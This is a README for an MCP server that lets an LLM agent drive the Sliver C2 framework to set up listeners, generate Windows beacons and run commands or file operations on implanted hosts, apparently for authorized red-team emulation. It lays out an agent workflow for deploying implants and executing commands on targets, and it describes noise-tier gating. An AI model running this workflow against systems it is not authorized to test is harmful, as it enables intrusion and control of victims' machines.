sliver-mcp

A Model Context Protocol server for the Sliver C2 framework that exposes operator tools like listeners, implant generation, sessions, command execution, and file operations for LLM-driven adversary emulation.


███████╗██╗     ██╗██╗   ██╗███████╗██████╗      ███╗   ███╗ ██████╗██████╗
██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗     ████╗ ████║██╔════╝██╔══██╗
███████╗██║     ██║██║   ██║█████╗  ██████╔╝████╗██╔████╔██║██║     ██████╔╝
╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗╚═══╝██║╚██╔╝██║██║     ██╔═══╝
███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║     ██║ ╚═╝ ██║╚██████╗██║
╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝     ╚═╝     ╚═╝ ╚═════╝╚═╝
   drive the Sliver C2 operator surface from an AI agent

A Model Context Protocol server for the Sliver C2 framework. It exposes the Sliver operator surface — listeners, implant/beacon generation, sessions and beacons, command execution, file operations, and a structured handoff — as mcp__sliver__* tools an LLM agent can drive.

It is the C2 layer of the AI-offsec stack, built to slot in alongside the p0rtix (recon) and Metasploit (exploitation) MCP servers and orchestrated by the dagar-red skill system. It mirrors their conventions: Python + FastMCP, async tools, structured-dict returns, and a noise / arm_dangerous safety gate.

⚠️ Authorized use only. This drives a live C2 framework. Use it only against infrastructure you own or are explicitly authorized to test — owned labs, CTFs, and contracted engagements. It is built for adversary emulation: standing up realistic C2 so defenders can test and improve detection and response. The noise tiers and the arm_dangerous gate exist to keep operation deliberate and in scope.


⚡ Quick start

# install
git clone git@github.com:v0idravl/sliver-mcp.git && cd sliver-mcp
python3 -m venv venv && ./venv/bin/pip install -e .

# register with Claude Code (see below), then in-agent:
connect()                         # attach to your team server
set_noise("yellow")               # allow actions that touch a host
start_https_listener(port=443)
generate_beacon(c2_host="<redirector>", os="windows")
# … deliver the beacon, then …
poll_events(); list_sessions(); execute_command(id, "whoami")

Requires Python ≥ 3.11 and a reachable Sliver team server with an operator config (.cfg). See docs/live-test.md for standing up a local server and generating one.


🧠 How it relates to Sliver's built-in MCP

Sliver ships an experimental built-in MCP, but it is filesystem-only (≈11 tools: fs_ls, fs_cat, fs_rm, …). sliver-mcp is a superset focused on the full operator workflow — listeners, payload generation, sessions/beacons, execution, and cross-tool handoff — so an agent can run an engagement end to end.


🔌 Register with Claude Code

Add to ~/.claude.json (or via claude mcp add). Point SLIVER_CONFIG at your operator config:

"sliver": {
  "type": "stdio",
  "command": "/home/youruser/projects/sliver-mcp/venv/bin/sliver-mcp",
  "args": [],
  "env": { "SLIVER_CONFIG": "/home/youruser/.sliver-client/configs/operator.cfg" }
}

The server starts whether or not the team server is up — call connect() first; tools that need a live client return a structured "not connected" error until it succeeds.


🧰 Tool surface (mcp__sliver__*)

| Category | Tools | What they do |
|---|---|---|
| Connection / state | connect, status, get_version, poll_events, disconnect | attach to the team server, check health, drain the async event queue (new callbacks, task results) |
| Listeners | start_https_listener, start_http_listener, start_mtls_listener, start_dns_listener, start_wg_listener, list_jobs, kill_job | stand up / tear down C2 listeners across protocols |
| Implant generation | generate_implant, generate_beacon, list_implant_builds, list_implant_profiles, regenerate_implant | build session implants and async beacons; reuse profiles and prior builds |
| Sessions / beacons | list_sessions, list_beacons, session_info, beacon_info, kill_session, kill_beacon | enumerate and inspect callbacks; retire them |
| Execution | execute, execute_command | run a binary / run a shell command on a session or beacon |
| File operations | ls, pwd, cd, mkdir, download, upload, rm | navigate and move files on the target |
| Pivots | list_pivots | enumerate pivot listeners on a session |
| Handoff | export_handoff, ingest_handoff | exchange C2 state with the rest of the stack |
| Safety | set_noise, arm_dangerous | raise the noise ceiling / unlock destructive actions |

🚦 Safety / noise model

Every tool carries a noise tier. A call above the current ceiling is refused with a structured reason — never silently downgraded.

| Tier | Meaning | Examples |
|---|---|---|
| passive | read-only state | status, list_sessions, export_handoff |
| green | build / stand up our own infra | listeners, generate_*, ls, download |
| yellow | actions that touch the target | execute, upload, kill_session |
| red | destructive | rm (also requires arm_dangerous()) |

The default ceiling is green: call set_noise("yellow") before running commands on a host (the sliver-ops loop does this explicitly), and arm_dangerous() to unlock rm.
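
A sketch of how a tier gate like the one described above can be enforced in front of every tool call. This is an added example, not sliver-mcp's own code: the NoiseGate class, the returned dict fields, and the reading that rm needs both a red ceiling and arm_dangerous() are assumptions.

```python
from enum import IntEnum

class Noise(IntEnum):
    PASSIVE = 0
    GREEN = 1
    YELLOW = 2
    RED = 3

# Tool -> tier, from the tier table's examples (execute_command per the text).
TOOL_TIERS = {
    "status": Noise.PASSIVE, "list_sessions": Noise.PASSIVE,
    "export_handoff": Noise.PASSIVE,
    "start_https_listener": Noise.GREEN, "generate_beacon": Noise.GREEN,
    "ls": Noise.GREEN, "download": Noise.GREEN,
    "execute": Noise.YELLOW, "execute_command": Noise.YELLOW,
    "upload": Noise.YELLOW, "kill_session": Noise.YELLOW,
    "rm": Noise.RED,
}

class NoiseGate:
    """Hypothetical gate; dict field names are assumptions."""

    def __init__(self):
        self.ceiling = Noise.GREEN  # README: default ceiling is green
        self.armed = False

    def set_noise(self, level):
        if level.upper() not in Noise.__members__:
            return {"ok": False, "error": f"unknown noise tier: {level!r}"}
        self.ceiling = Noise[level.upper()]
        return {"ok": True, "ceiling": level.lower()}

    def arm_dangerous(self):
        self.armed = True
        return {"ok": True, "armed": True}

    def check(self, tool):
        tier = TOOL_TIERS.get(tool)
        if tier is None:  # fail closed on tools nobody has classified
            return self._refuse(tool, "unclassified tool")
        if tier > self.ceiling:  # refuse, never downgrade the call
            return self._refuse(tool, "above noise ceiling")
        if tier is Noise.RED and not self.armed:
            return self._refuse(tool, "arm_dangerous required")
        return {"ok": True, "tool": tool, "tier": tier.name.lower()}

    def _refuse(self, tool, reason):
        return {"ok": False, "refused": True, "tool": tool, "reason": reason,
                "ceiling": self.ceiling.name.lower()}
```

Logging every refusal dict alongside the agent's request gives reviewers an audit trail of what the agent attempted outside the approved ceiling.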


🔁 Typical loop

connect()
set_noise("yellow")
start_https_listener(port=443, domain="<redirector>")
generate_beacon(c2_host="<redirector>", os="windows", interval=60, jitter=30)
# … deliver the beacon (payload-delivery / loader-injection-tradecraft) …
poll_events()            # watch for the callback
list_sessions()
execute_command(target_id, "whoami")
export_handoff()         # feed C2 state back to internal-dispatch

Beacons vs sessions

execute and the file tools accept either a session id (interactive, low latency) or a beacon id (asynchronous — the result returns after the next check-in, every interval ± jitter seconds). Use poll_events() to watch for new callbacks and task completion.


⚠️ Known limitations (v1)

These reflect the current sliver-py surface, not the design:

  • No client-side SOCKS / port-forward tunnels. sliver-py does not implement the tunnel streaming, so only list_pivots is exposed. Use the Sliver console for socks/portfwd.
  • No interactive PTY shell. A streaming PTY can't be a single request/response tool; execute_command covers command execution.
  • No cp / chmod / chown and no loot/creds store — not in sliver-py's base command set. Planned once upstream exposes them.

🩹 Troubleshooting

| Symptom | Fix |
|---|---|
| Every tool returns "not connected" | Call connect() first. The server starts without the team server; tools needing a live client wait for a successful connect. |
| connect() fails | Check SLIVER_CONFIG points at a valid operator .cfg, and that the team server is reachable (host/port in the config). See docs/live-test.md. |
| A call is "refused: above noise ceiling" | Raise it deliberately: set_noise("yellow") for target-touching actions, arm_dangerous() for rm. |
| No callback after delivery | poll_events() drains the async queue; beacons only report on the next interval ± jitter check-in. |
| Need SOCKS / portfwd | Not exposed (see limitations) — use the Sliver console for now. |

🧪 Tests

./venv/bin/pip install -e '.[dev]'
./venv/bin/pytest          # 64 tests, no live server required

The suite mocks sliver-py, so it is green on a clean machine. For a live end-to-end smoke test, see docs/live-test.md.


License

MIT. See LICENSE.
